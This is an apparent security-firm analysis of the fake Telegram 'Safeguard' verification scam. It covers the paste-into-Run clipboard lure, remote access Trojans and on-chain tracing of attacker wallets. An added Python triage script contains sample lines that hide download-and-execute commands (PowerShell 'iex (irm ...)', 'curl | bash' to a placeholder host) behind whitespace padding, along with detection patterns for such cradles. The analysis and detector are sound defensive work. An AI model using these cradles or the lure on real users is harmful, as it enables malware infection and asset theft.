Telegram fake verification scam: how the "Safeguard" method works and how not to be fooled


Scam Analysis

This type of scam comes in two categories. The first steals Telegram accounts: scammers trick users into entering their phone number, login code and even their Two-Step Verification password, then take over the account. The second plants a Trojan on the user's computer, which has recently become the more common method, and it is the one this article focuses on.

During some very popular token airdrops, when users' FOMO is at its peak, they see a channel interface in Telegram like the one in the image below and will almost certainly click "Tap to verify":

After clicking "Tap to verify", a fake Safeguard bot opens and appears to run a verification. The verification window is extremely short, which creates a sense of urgency and pushes the user to keep going.

After further clicks, the bot pretends that verification has failed, and finally shows a prompt telling the user to verify manually:

The scammers have helpfully laid out Step 1, Step 2 and Step 3; by this point the user's clipboard already contains malicious code.

As long as the user does not actually carry out these steps, nothing bad happens:

But if the user obediently follows them, the computer is infected with a virus.

Here is another example: the attacker impersonates a KOL and uses a malicious bot to walk the victim through running malicious PowerShell code. The scammers create a fake KOL account on X, then post a Telegram link in the comments inviting users to join an "exclusive" Telegram group for investment tips. For example, the comment section of @BTW0205 contains a scam account, and many users will see an "exciting message" like this in the comments:

The link leads to the corresponding Telegram channel, where the user is prompted to verify.

When the user clicks to verify, a fake Safeguard appears, and the process is the same as above: Step 1, Step 2 and Step 3 guide the user through the "verification".

By this point the malicious code has already been silently placed on the user's clipboard. If the user really follows the guide, opens the Run dialog and pastes the clipboard content into it with Ctrl + V, the result looks like the figure below: the Run dialog cannot display the entire content, because a large block of blank space has been placed in front of the "Telegram" text and the malicious code.

This malicious code is usually a PowerShell command which, when executed, silently downloads a more complex payload and ultimately infects the computer with a remote access Trojan (such as Remcos). Once the computer is under the Trojan's control, the attacker can remotely steal wallet files, seed phrases, private keys, passwords and other sensitive data from it, and then steal the assets.

The comment section of the Ethereum Foundation account @ethereumfndn has also been polluted by this scam, which shows how it is run as a wide net cast at scale and then harvested.

The most recent case is the comment section of Trump's X account, which has likewise been polluted by this scam:

On a mobile phone, the scam instead works step by step toward taking over your Telegram account. If you notice in time, go immediately to Telegram Settings -> Privacy and Security -> Active Sessions -> Terminate All Other Sessions, and then set up or change your Two-Step Verification password.

If you are on a Mac rather than a Windows computer, a similar lure exists. The routine is the same: by the time the screen below appears in Telegram, malicious code has already been silently placed on your clipboard.

At this point there is still no harm done, but if you follow the given steps, the result is as shown in the figure below:
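The two paste-into-Run passages above (the Windows variant with the padded PowerShell line hidden behind a "Telegram" label, and the Mac variant) describe the same lure shape: a one-line download command on the clipboard, followed by a long run of blank space and a harmless-looking label so that only the label is visible in the Run dialog or Terminal. The script below is an added example, not code from the original article or from SlowMist: it scores text of that shape, either Run-history strings collected during triage or the current clipboard before you paste. The sample entries are constructed for the example and `placeholder.invalid` is a placeholder host, not a real indicator; the token list is a generic heuristic, not a signature for the specific campaign.

```python
"""Triage helper for the paste-into-Run lure: flags clipboard / Run-history text
that hides a download cradle behind whitespace padding and a decoy label.
Added example; samples below are constructed, placeholder.invalid is not a real host."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import List, Optional

# Tokens typical of one-line download cradles (Windows PowerShell and macOS shell).
CRADLE_PATTERNS = [
    ("powershell-hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("powershell-encoded-command", re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("invoke-expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("web-fetch", re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|curl|wget)\b", re.I)),
    ("mshta", re.compile(r"\bmshta(?:\.exe)?\b", re.I)),
    ("pipe-to-shell", re.compile(r"\|\s*(?:ba|z)?sh\b", re.I)),
    ("base64-decode", re.compile(r"base64\s+(?:-d\b|--decode)|frombase64string", re.I)),
]
# Fetching alone is common in honest commands; these tokens mean fetched/hidden code is run.
EXECUTION_TOKENS = {"powershell-hidden-window", "powershell-encoded-command",
                    "invoke-expression", "mshta", "pipe-to-shell"}
MIN_PADDING = 20  # no hand-typed command contains a run of 20+ blanks
TRAILING_DECOY = re.compile(r"\s{10,}(#[^\r\n]*)\s*$")  # "...   # Telegram verification"

# Constructed Run-history entries: two benign, one benign fetch, one Windows lure, one Mac lure.
SAMPLE_RUN_ENTRIES = [
    "notepad.exe",
    "cmd /c ipconfig /all",
    "curl https://example.com/file.txt -o file.txt",
    'powershell -w hidden -c "iex (irm https://placeholder.invalid/x)"'
    + " " * 200 + "# Telegram Safeguard verification",
    "curl -fsSL https://placeholder.invalid/s | bash" + " " * 150 + "# Telegram",
]


@dataclass
class Assessment:
    preview: str                 # first 60 visible characters, whitespace collapsed
    padding_run: int             # longest run of whitespace characters in the text
    decoy_label: Optional[str]   # trailing "# ..." label hidden behind the padding
    cradle_hits: List[str] = field(default_factory=list)
    reasons: List[str] = field(default_factory=list)
    suspicious: bool = False


def longest_whitespace_run(text: str) -> int:
    return max((len(m.group()) for m in re.finditer(r"\s+", text)), default=0)


def assess_pasted_command(text: str) -> Assessment:
    """Score one Run-dialog / Terminal line. Pure function; never executes anything."""
    padding = longest_whitespace_run(text)
    decoy = TRAILING_DECOY.search(text)
    hits = [label for label, rx in CRADLE_PATTERNS if rx.search(text)]
    a = Assessment(
        preview=re.sub(r"\s+", " ", text.strip())[:60],
        padding_run=padding,
        decoy_label=decoy.group(1).strip() if decoy else None,
        cradle_hits=hits,
    )
    if padding >= MIN_PADDING and a.decoy_label:
        a.reasons.append(f"{padding} blank characters hide the command behind the label {a.decoy_label!r}")
    executes = [h for h in hits if h in EXECUTION_TOKENS]
    if executes:
        a.reasons.append("runs fetched or hidden code: " + ", ".join(executes))
    a.suspicious = bool(a.reasons)
    return a


def triage_run_history(entries: List[str]) -> List[Assessment]:
    """Assess collected Run-history strings and keep only the suspicious ones."""
    return [a for a in map(assess_pasted_command, entries) if a.suspicious]


def read_clipboard_text() -> Optional[str]:
    """Current clipboard text via tkinter, or None when no display/clipboard is available."""
    try:
        import tkinter
        root = tkinter.Tk()
        root.withdraw()
        try:
            return root.clipboard_get()
        finally:
            root.destroy()
    except Exception:
        return None


if __name__ == "__main__":
    clip = read_clipboard_text()
    targets = [clip] if clip else SAMPLE_RUN_ENTRIES  # check the clipboard if we have one
    for a in map(assess_pasted_command, targets):
        print(("SUSPICIOUS" if a.suspicious else "ok        ") + f" {a.preview!r}")
        for r in a.reasons:
            print(f"           - {r}")
```

Run it with a populated clipboard to check what you are about to paste; with no clipboard it reports on the constructed samples. The padding-plus-label rule catches the lure shape itself, independent of which command is hidden, while the execution tokens catch cradles that skip the padding trick; a plain `curl -o` download matches neither, so it is reported as ok.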

MistTrack Analysis

We selected several hacker addresses and analyzed them with MistTrack, the on-chain tracking and anti-money-laundering platform.

Solana hacker addresses:

HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV

2v1DUcjyNBerUcYcmjrDZNpxfFuQ2Nj28kZ9mea3T36W

D8TnJAXML7gEzUdGhY5T7aNfQQXxfr8k5huC6s11ea5R

According to MistTrack, the three hacker addresses above have so far taken in over $1.2 million, including SOL and multiple SPL tokens.

The hackers first convert most of the SPL tokens into SOL:

They then split the SOL and transfer it to multiple addresses; the hacker addresses also interact with platforms such as Binance, Huobi and FixedFloat:

In addition, the address HVJGvGZpREPQZBTScZMBMmVzwiaVNN2MfSWLgeP6CrzV still holds a balance of 1,169.73 SOL plus tokens worth over $10,000.

We also analyzed one of the Ethereum hacker addresses, 0x21b681c98ebc32a9c6696003fc4050f63bc8b2c6, whose first transaction was in January 2025; it is active on multiple chains and currently holds a balance of around $130,000.

This address has transferred ETH to multiple platforms, including ChangeNOW, eXch and Cryptomus.com:

How to Prevent

If your computer is infected, do the following immediately:

1. Immediately move the funds out of every wallet used on this computer; do not assume that a browser-extension wallet is safe just because it is password-protected;

2. As far as possible, change the passwords and 2FA of every account logged in through the browsers on this computer;

3. Change the passwords of other accounts used on the computer, such as Telegram, if possible.

Assume the worst: once your computer is infected, everything on it is visible to the scammers. Think in reverse: if you were the scammer with full control of a computer that is active in the Web3/crypto world, what would you do with it? Finally, after backing up important data, reinstall the operating system; it is best to install well-known international antivirus software such as AVG, Bitdefender or Kaspersky after the reinstall and run a full scan, after which the problem is resolved.

Summary

The fake Safeguard scam has evolved into a mature attack model: from fake comments that lure traffic, to planting Trojans, to finally stealing assets, the whole chain is covert and efficient. As the techniques grow more sophisticated, users need to be more wary of any inducing link or step-by-step instruction they encounter online; staying alert, strengthening protection, and detecting and dealing with potential threats promptly are effective ways to limit the harm of such scams.
